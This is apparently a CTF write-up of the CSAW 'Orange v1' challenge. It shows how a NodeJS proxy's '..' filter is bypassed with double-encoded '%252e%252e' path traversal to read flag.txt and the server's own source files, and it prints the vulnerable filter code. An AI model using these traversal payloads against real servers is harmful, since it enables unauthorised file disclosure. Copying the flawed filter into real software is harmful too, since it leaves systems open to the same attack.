Tags: lfi
# ▼▼▼Orange v1(Web:100)▼▼▼ (421/1444 team=29.2%)
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
http://web.chal.csaw.io:7311/?path=orange.txt
```
### 【function】
GET /?path=orange.txt
↓
`i love oranges`
### 【goal】
find **flag.txt**
### 【Search for vulnerabilities】
GET /?path=
↓
```
<html>
<title>Directory listing for /poems/</title>
<body>
<h2>Directory listing for /poems/</h2>
<hr>
```
↓
**Directory listing vulnerability★**
-----
GET /?path=../
GET /?path=..
↓
`WHOA THATS BANNED!!!!`
↓
**..(dot) is detected!!★**
-----
**Double encoding** (https://www.owasp.org/index.php/Double_Encoding)
↓
GET /?path=**%252e%252e**/
↓
```
<html>
<title>Directory listing for /poems/../</title>
<body>
<h2>Directory listing for /poems/../</h2>
<hr>
```
↓
Success!!★
-----
GET /?path=%252e%252e/flag.txt
↓
**flag{thank_you_based_orange_for_this_ctf_challenge}**
-----
### Reference: other source code
GET /?path=%252e%252e/server.js
↓
```
var http = require('http');
var fs = require('fs');
var url = require('url');

var server = http.createServer(function(req, res) {
  try {
    // url.parse(..., true) percent-decodes the query string once, so a
    // double-encoded "%252e%252e" reaches the check below as "%2e%2e".
    var path = url.parse(req.url, true).query;
    path = path['path'];
    // Literal substring filter: only a fully decoded ".." is caught.
    if (path.indexOf("..") == -1 && path.indexOf("NN") == -1) {
      var base = "http://localhost:8080/poems/";
      var callback = function(response){
        var str = '';
        response.on('data', function (chunk) {
          str += chunk;
        });
        response.on('end', function () {
          res.end(str);
        });
      }
      // The still-encoded path is forwarded to the Python backend,
      // which decodes it a second time before resolving it.
      http.get(base + path, callback).end();
    } else {
      res.writeHead(403);
      res.end("WHOA THATS BANNED!!!!");
    }
  }
  catch (e) {
    res.writeHead(404);
    res.end('Oops');
  }
});
server.listen(9999);
```
-----
GET /?path=%252e%252e/back.py
↓
```
#!/usr/bin/python
# Python 2 static file server: unquotes the request path and normalises it
# (so "/poems/%2e%2e/flag.txt" becomes "/flag.txt" relative to the working directory),
# and lists directories when no index file is present.
import SimpleHTTPServer
import SocketServer
PORT = 8080
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "Serving at port", PORT
httpd.serve_forever()
```
-----
GET /?path=%252e%252e/serve.sh
↓
```
#!/usr/bin/env bash
python back.py &
nodejs server.js
```
-----
GET /?path=.%252e/.dockerignore
↓
```
Dockerfile
docker-compose.yml
README.md
```